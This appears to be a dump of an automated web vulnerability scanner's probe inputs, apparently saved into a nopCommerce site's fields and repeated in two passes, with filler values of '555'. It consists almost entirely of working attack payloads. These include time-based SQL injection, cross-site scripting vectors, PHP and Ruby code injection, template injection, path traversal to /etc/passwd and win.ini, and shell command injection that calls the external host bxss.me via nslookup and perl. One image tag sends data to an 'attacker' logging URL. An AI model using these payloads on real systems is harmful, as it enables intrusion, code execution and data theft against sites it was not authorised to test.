".gethostbyname(lc("hitwv"."cflgajlhcc626.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(67).chr(108).chr(79)."
555"&&sleep(27*1000)*nfzpdi&&"
555
555'||sleep(27*1000)*vdelln||'
555
555"||sleep(27*1000)*lzydjo||"
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
555
'.print(md5(31337)).'
HttP://bxss.me/t/xss.html?%00
555
"+"A".concat(70-3).concat(22*4).concat(108).concat(70).concat(116).concat(87)+(require"socket"
Socket.gethostbyname("hital"+"mkhckytu78c9d.bxss.me.")[3].to_s)+"
555
bxss.me/t/xss.html?%00
'+'A'.concat(70-3).concat(22*4).concat(105).concat(85).concat(98).concat(78)+(require'socket'
Socket.gethostbyname('hitbg'+'uudlxorrfb36f.bxss.me.')[3].to_s)+'
555
555
555
555
555
nopcommerce-new-release
555
555
555
nopcommerce-new-release/.
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
xfs.bxss.me
'"
555
<!--
555
555'"()&%<zzz><ScRiPt >1np9(9495)</ScRiPt>
555
555
555
if(now()=sysdate(),sleep(15),0)
'"()&%<zzz><ScRiPt >1np9(9952)</ScRiPt>
5559084627
bfg9452<s1﹥s2ʺs3ʹhjl9452
555
555
555
bfgx4606%C0%BEz1%C0%BCz2a%90bcxhjl4606
555
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >1np9(9375)</ScRiPt>
555<WSXBAQ>VZY7Y[!+!]</WSXBAQ>
555<script>1np9(9316)</script>
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555<ScR<ScRiPt>IpT>1np9(9734)</sCr<ScRiPt>IpT>
555<ScRiPt
>1np9(9135)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9752></ScRiPt>
555<isindex type=image src=1 onerror=1np9(9959)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9830'>
555<body onload=1np9(9563)>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555<img src=//xss.bxss.me/t/dot.gif onload=1np9(9992)>
555<img src=xyz OnErRor=1np9(9193)>
555<img/src=">" onerror=alert(9271)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%31%6E%70%39%289851%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\1np9(9431)\u003C/sCripT\u003E
555<ScRiPt>1np9(9909)</sCripT>
-1; waitfor delay '0:0:15' --
%F6<img zzz onmouseover=1np9(97871) //%F6>
555<input autofocus onfocus=1np9(9564)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(1np9(9835))}
555bPP8r
<ScRiPt >1np9(9540)</ScRiPt>
555<WNBIFE>DTDEI[!+!]</WNBIFE>
-1); waitfor delay '0:0:15' --
555<ifRAme sRc=9857.com></IfRamE>
555<a0TlFxy x=9956>
555<img sRc='http://attacker-9870/log.php?
555<an7D7yq<
555
555
555
-1)); waitfor delay '0:0:15' --
555
555
555
555
555
1 waitfor delay '0:0:15' --
555
555
555
555
555
555
zHGhg90W'; waitfor delay '0:0:15' --
555
555
555
555
555
iLiEyw3Y'); waitfor delay '0:0:15' --
555
555
555
555
NQD8whBj')); waitfor delay '0:0:15' --
555
555
555
555
555
-5 OR 893=(SELECT 893 FROM PG_SLEEP(15))--
555
555
555
555
555
-5) OR 131=(SELECT 131 FROM PG_SLEEP(15))--
555
555
555
555
555
-1)) OR 158=(SELECT 158 FROM PG_SLEEP(15))--
555
555
AL4U8XK3' OR 743=(SELECT 743 FROM PG_SLEEP(15))--
xsksQCnN') OR 581=(SELECT 581 FROM PG_SLEEP(15))--
Oodael8Y')) OR 370=(SELECT 370 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@aECeZ
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
response.write(9793639*9368103)
'+response.write(9793639*9368103)+'
555
"+response.write(9793639*9368103)+"
echo umwtqu$()\ qrxpsj\nz^xyu||a #' &echo umwtqu$()\ qrxpsj\nz^xyu||a #|" &echo umwtqu$()\ qrxpsj\nz^xyu||a #
&echo bnftfp$()\ ucfwnu\nz^xyu||a #' &echo bnftfp$()\ ucfwnu\nz^xyu||a #|" &echo bnftfp$()\ ucfwnu\nz^xyu||a #
555
555
|echo labeos$()\ lqflbd\nz^xyu||a #' |echo labeos$()\ lqflbd\nz^xyu||a #|" |echo labeos$()\ lqflbd\nz^xyu||a #
555
(nslookup hitoofkegvnklcd730.bxss.me||perl -e "gethostbyname('hitoofkegvnklcd730.bxss.me')")
mBExHoLu
$(nslookup hittoulskmsfu2fbaf.bxss.me||perl -e "gethostbyname('hittoulskmsfu2fbaf.bxss.me')")
&nslookup hitjilkywyxqn1f82f.bxss.me&'\"`0&nslookup hitjilkywyxqn1f82f.bxss.me&`'
555
&(nslookup hitpkeqzisxhi2258c.bxss.me||perl -e "gethostbyname('hitpkeqzisxhi2258c.bxss.me')")&'\"`0&(nslookup hitpkeqzisxhi2258c.bxss.me||perl -e "gethostbyname('hitpkeqzisxhi2258c.bxss.me')")&`'
555
|(nslookup hitcfgrtdinfo0a032.bxss.me||perl -e "gethostbyname('hitcfgrtdinfo0a032.bxss.me')")
`(nslookup hituwzcynmskme649e.bxss.me||perl -e "gethostbyname('hituwzcynmskme649e.bxss.me')")`
;(nslookup hityvezhxwtci3c791.bxss.me||perl -e "gethostbyname('hityvezhxwtci3c791.bxss.me')")|(nslookup hityvezhxwtci3c791.bxss.me||perl -e "gethostbyname('hityvezhxwtci3c791.bxss.me')")&(nslookup hityvezhxwtci3c791.bxss.me||perl -e "gethostbyname('hityvezhxwtci3c791.bxss.me')")
555
555
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
555
file:///etc/passwd
555
555
555
../555
555
555
555
bcc:074625.678-328028.678.c9f6c.19270.2@bxss.me
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
to@example.com>
bcc:074625.678-328029.678.c9f6c.19270.2@bxss.me
555
555
555
555
555
${9999739+9999746}
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
/etc/shells
555&n977812=v987952
c:/windows/win.ini
)
bxss.me
!(()&&!|*|*|
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
-1 OR 2+946-946-1=0+0+0+1 --
-1 OR 2+530-530-1=0+0+0+1
-1' OR 2+133-133-1=0+0+0+1 --
-1' OR 2+578-578-1=0+0+0+1 or 'LAETwkG0'='
555
555
-1" OR 2+353-353-1=0+0+0+1 --
'"()
'.gethostbyname(lc('hitsd'.'uisymdds48d5e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(66).chr(120).chr(85).'
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
".gethostbyname(lc("hittz"."rbctelyoa2496.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(79).chr(114).chr(88)."
555
555
';print(md5(31337));$a='
555
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
555
555'&&sleep(27*1000)*utnfiv&&'
555"&&sleep(27*1000)*goznkr&&"
555
555'||sleep(27*1000)*wqtzmd||'
555
555"||sleep(27*1000)*cbfcew||"
555
555
555
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555
555
if(now()=sysdate(),sleep(15),0)
555
"+"A".concat(70-3).concat(22*4).concat(109).concat(75).concat(121).concat(69)+(require"socket"
Socket.gethostbyname("hitek"+"anvmetmla305a.bxss.me.")[3].to_s)+"
555
'+'A'.concat(70-3).concat(22*4).concat(118).concat(85).concat(106).concat(71)+(require'socket'
Socket.gethostbyname('hituf'+'cgsmwwitd5c25.bxss.me.')[3].to_s)+'
555
555
555
555
nopcommerce-new-release
555
555
nopcommerce-new-release/.
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
xfs.bxss.me
555
'"
<!--
555
555
555
555
555
555'"()&%<zzz><ScRiPt >4PcJ(9029)</ScRiPt>
'"()&%<zzz><ScRiPt >4PcJ(9755)</ScRiPt>
555'"()&%<zzz><ScRiPt >5f0l(9357)</ScRiPt>
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
5559398333
555
'"()&%<zzz><ScRiPt >5f0l(9804)</ScRiPt>
555
555
555
555
555
555
555
555
555
5559894731
bfg2705<s1﹥s2ʺs3ʹhjl2705
555
555
555
bfgx10972%C0%BEz1%C0%BCz2a%90bcxhjl10972
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >4PcJ(9387)</ScRiPt>
555<WXZCY0>EQRKQ[!+!]</WXZCY0>
555<script>4PcJ(9148)</script>
555<ScR<ScRiPt>IpT>4PcJ(9882)</sCr<ScRiPt>IpT>
-1; waitfor delay '0:0:15' --
555<ScRiPt
>4PcJ(9608)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9781></ScRiPt>
555<isindex type=image src=1 onerror=4PcJ(9204)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9705'>
-1); waitfor delay '0:0:15' --
555<body onload=4PcJ(9911)>
555<img src=//xss.bxss.me/t/dot.gif onload=4PcJ(9518)>
555<img src=xyz OnErRor=4PcJ(9785)>
555<img/src=">" onerror=alert(9891)>
-1)); waitfor delay '0:0:15' --
%35%35%35%3C%53%63%52%69%50%74%20%3E%34%50%63%4A%289573%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\4PcJ(9972)\u003C/sCripT\u003E
555<ScRiPt>4PcJ(9299)</sCripT>
%F6<img zzz onmouseover=4PcJ(96141) //%F6>
555<input autofocus onfocus=4PcJ(9408)>
1 waitfor delay '0:0:15' --
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(4PcJ(9247))}
555wibAq
<ScRiPt >4PcJ(9272)</ScRiPt>
QaNrqgIr'; waitfor delay '0:0:15' --
555<WVDVX1>HNODG[!+!]</WVDVX1>
555<ifRAme sRc=9290.com></IfRamE>
555<afxSFRU x=9112>
555<img sRc='http://attacker-9910/log.php?
555<aeKftPi<
7ByJsTel'); waitfor delay '0:0:15' --
555
555
555
555
BDnhc97O')); waitfor delay '0:0:15' --
555
555
555
555
555
-5 OR 235=(SELECT 235 FROM PG_SLEEP(15))--
555
555
555
555
555
-5) OR 84=(SELECT 84 FROM PG_SLEEP(15))--
555
555
555
555
-1)) OR 21=(SELECT 21 FROM PG_SLEEP(15))--
555
555
555
555
555
W96om50a' OR 347=(SELECT 347 FROM PG_SLEEP(15))--
555
555
555
555
giOSmepf') OR 714=(SELECT 714 FROM PG_SLEEP(15))--
555
555
555
555
RAgJvCbL')) OR 302=(SELECT 302 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@eWRDJ
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555